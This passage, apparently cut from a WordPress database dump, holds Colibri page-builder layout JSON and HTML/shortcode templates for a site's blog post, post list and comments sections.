ags-container\",\"slot\":null,\"parentId\":\"31-m7\",\"index\":1,\"id\":\"31-m15\",\"partialId\":31,\"styleRef\":84,\"type\":\"main\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"31-m16\",\"parentId\":\"31-m15\",\"partialId\":31,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"31-m16\",\"index\":0,\"id\":\"31-m17\",\"partialId\":31,\"styleRef\":86,\"type\":\"main\",\"props\":{\"content\":\"<p>Tags:<\\/p>\"}}],\"styleRef\":85,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"id\":\"31-m18\",\"parentId\":\"31-m15\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-tags\",\"slot\":null,\"parentId\":\"31-m18\",\"index\":2,\"id\":\"31-m19\",\"partialId\":31,\"styleRef\":88,\"type\":\"main\",\"props\":{\"prefix\":\"\"}}],\"styleRef\":87,\"type\":\"main\"}]}],\"styleRef\":76,\"type\":\"main\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}}}],\"slot\":null,\"index\":1},{\"name\":\"hop-post-nav-container\",\"parentId\":\"31-m4\",\"id\":\"31-m20\",\"partialId\":31,\"styleRef\":89,\"type\":\"main\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"31-m21\",\"parentId\":\"31-m20\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-nav-button\",\"slot\":null,\"parentId\":\"31-m21\",\"index\":0,\"id\":\"31-m22\",\"partialId\":31,\"styleRef\":91,\"type\":\"main\",\"props\":{\"type\":\"prev\",\"showPostTitle\":false,\"prevLabel\":\"Previous post\",\"postTitleLength\":\"40\",\"stateType\":\"\"}}],\"styleRef\":90,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"31-m23\",\"parentId\":\"31-m20\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-nav-button\",\"slot\":null,\"parentId\":\"31-m23\",\"index\":0,\"id\":\"31-m24\",\"partialId\":31,\"styleRef\":93,\"type\":\"main\",\"props\":{\"nextLabel\":\"Next post\",\"showPostTitle\":false,\"stateType\":\"\"}}],\"styleRef\":92,\"type\":\"main\"}],\"slot\":null,\"index\":2}],\"id\":\"31-m4\",\"parentId\":\"31-m3\",\"partialId\":31,\"styleRef\":73,\"type\":\"main\"}]},\"slot\":null,\"parentId\":\"31-m2\",\"index\":0,\"id\":\"31-m3\",\"partialId\":31,\"styleRef\":72,\"type\":\"main\"}],\"parentId\":\"31-m1\",\"type\":\"main\",\"props\":{\"anchor\":false,\"name\":\"Blog Post\",\"attrs\":{\"id\":\"blog-post\"}},\"id\":\"31-m2\",\"partialId\":31,\"styleRef\":67},{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"31-m36\",\"parentId\":\"31-m35\",\"partialId\":31,\"styleRef\":97,\"type\":\"main\"},{\"name\":\"hop-text\",\"id\":\"31-m37\",\"parentId\":\"31-m35\",\"partialId\":31,\"styleRef\":98,\"type\":\"main\"}],\"id\":\"31-m35\",\"parentId\":\"31-m34\",\"partialId\":31,\"styleRef\":96,\"type\":\"main\"}],\"id\":\"31-m34\",\"parentId\":\"31-m29\",\"partialId\":31,\"styleRef\":95,\"type\":\"main\"}]},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"31-m31\",\"parentId\":\"31-m30\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-comments\",\"slot\":null,\"parentId\":\"31-m31\",\"index\":0,\"id\":\"31-m32\",\"partialId\":31,\"styleRef\":101,\"type\":\"main\",\"props\":{\"multipleTitle\":\"{COMMENTS-COUNT} Responses\",\"avatarSize\":30,\"noneTitle\":\"No responses yet\"}},{\"name\":\"hop-post-comment-form\",\"id\":\"31-m33\",\"parentId\":\"31-m31\",\"partialId\":31,\"styleRef\":102,\"type\":\"main\"}],\"styleRef\":100,\"type\":\"main\"}],\"id\":\"31-m30\",\"parentId\":\"31-m29\",\"partialId\":31,\"styleRef\":99,\"type\":\"main\"}],\"parentId\":\"31-m1\",\"type\":\"main\",\"props\":{\"anchor\":false,\"name\":\"Comments\",\"attrs\":{\"id\":\"comments\"}},\"id\":\"31-m29\",\"partialId\":31,\"styleRef\":94}],\"id\":\"31-m1\",\"partialId\":31,\"styleRef\":66,\"type\":\"main\"}','','','publish','closed','closed','','32','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&p=32',0,'extb_post_json','',0),(33,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"31-m1\" class=\"style-66 style-local-31-m1 h-overflow-hidden position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"31-m2\" id=\"blog-post\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-67 style-local-31-m2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"31-m3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 colibri-dynamic-list colibri-single-post-loop style-72 style-local-31-m3 position-relative\">\n <!---->\n <div data-colibri-component=\"\" class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <!---->[colibri_loop]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-73-outer%20style-local-31-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%22432-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-73%20style-local-31-m4%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%22432-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20colibri-post-thumbnail-has-placeholder%20style-74%20style-local-31-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-31-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22false%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22432-m6%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-75%20style-local-31-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-76-outer%20style-local-31-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-76%20style-local-31-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m8%22%20class=%22h-blog-meta%20style-77%20style-local-31-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22432-m9%22%20class=%22style-78%20style-local-31-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%20colibri-post-content%22%3E%5Bcolibri_post_content%5D%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22432-m10%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-79%20style-local-31-m10%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-80-outer%20style-local-31-m11-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m11%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-80%20style-local-31-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m12%22%20class=%22h-text%20h-text-component%20style-81%20style-local-31-m12%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ECategories:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20style-82-outer%20style-local-31-m13-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-82%20style-local-31-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m14%22%20class=%22h-blog-categories%20style-83%20style-local-31-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%5Bcolibri_layout_wrapper%20name=%22tags_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22432-m15%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-84%20style-local-31-m15%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-center%20align-items-md-center%20align-items-center%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-85-outer%20style-local-31-m16-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m16%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-85%20style-local-31-m16%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m17%22%20class=%22h-text%20h-text-component%20style-86%20style-local-31-m17%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ETags:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-87-outer%20style-local-31-m18-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m18%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-87%20style-local-31-m18%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m19%22%20class=%22h-blog-tags%20empty-preview%20style-88%20style-local-31-m19%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_tags%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22navigation_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22432-m20%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-89%20style-local-31-m20%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-90-outer%20style-local-31-m21-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m21%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-90%20style-local-31-m21%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m22%22%20class=%22post-nav-button%20hide-title%20style-91%20style-local-31-m22%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22prev%22%20prev_post=%22Previous%20post%22%20next_post=%22Next%20post:%22%20show_title=%22false%22%20title_length=%2240%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-92-outer%20style-local-31-m23-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m23%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-92%20style-local-31-m23%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m24%22%20class=%22post-nav-button%20hide-title%20style-93%20style-local-31-m24%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22next%22%20prev_post=%22Previous%20post:%22%20next_post=%22Next%20post%22%20show_title=%22false%22%20title_length=%2230%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"31-m29\" id=\"comments\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-94 style-local-31-m29 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"31-m30\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-99 style-local-31-m30 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-100-outer style-local-31-m31-outer\">\n <div data-colibri-id=\"31-m31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-100 style-local-31-m31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"31-m32\" class=\"style-101 style-local-31-m32 position-relative\">\n <!---->\n <div class=\"h-global-transition-all blog-post-comments\">[colibri_post_comments none=\"No responses yet\" one=\"One response\" multiple=\"{COMMENTS-COUNT} Responses\" disabled=\"Comments are closed\" avatar_size=\"30\"]</div>\n </div>\n <div data-colibri-id=\"31-m33\" class=\"position-relative\">\n <!---->\n <div class=\"h-global-transition-all\">[colibri_post_comment_form]</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','main_post','','inherit','closed','closed','','31-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',31,'https://gsudice.dataconn.net/?p=33',0,'revision','',0),(34,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"34-m1\" class=\"style-103 style-local-34-m1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"34-m2\" id=\"blog-posts\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-104 style-local-34-m2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"34-m3\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-2 gutters-row-v-3 colibri-dynamic-list style-109 style-local-34-m3 position-relative\">\n <!---->\n <div data-colibri-component=\"masonry\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-2 gutters-col-v-3 style-109-row style-local-34-m3-row\">\n <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-6%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-110-outer%20style-local-34-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%2234-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-110%20style-local-34-m4%20h-overflow-hidden%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-href=%22%5Bcolibri_post_link%5D%22%20data-colibri-component=%22link%22%20%20data-colibri-id=%2234-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20style-111%20style-local-34-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-34-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22true%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m6%22%20class=%22h-row-container%20gutters-row-lg-3%20gutters-row-md-3%20gutters-row-3%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-112%20style-local-34-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-3%20gutters-col-md-3%20gutters-col-3%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-113-outer%20style-local-34-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%2234-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-113%20style-local-34-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2234-m8%22%20class=%22h-blog-meta%20style-114%20style-local-34-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m9%22%20class=%22h-blog-meta%20style-115%20style-local-34-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m10%22%20class=%22h-blog-title%20style-116%20style-local-34-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m11%22%20class=%22style-117%20style-local-34-m11%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%2216%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2234-m12%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-118%20style-local-34-m12%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-119-outer%20style-local-34-m13-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%2234-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-119%20style-local-34-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2234-m14%22%20class=%22h-blog-meta%20style-120%20style-local-34-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%3C!----%3E%3C!----%3E%3Cdiv%20name=%224%22%20class=%22metadata-item%22%3E%3C!----%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_comments_url%5D%22%3E%3Cspan%20%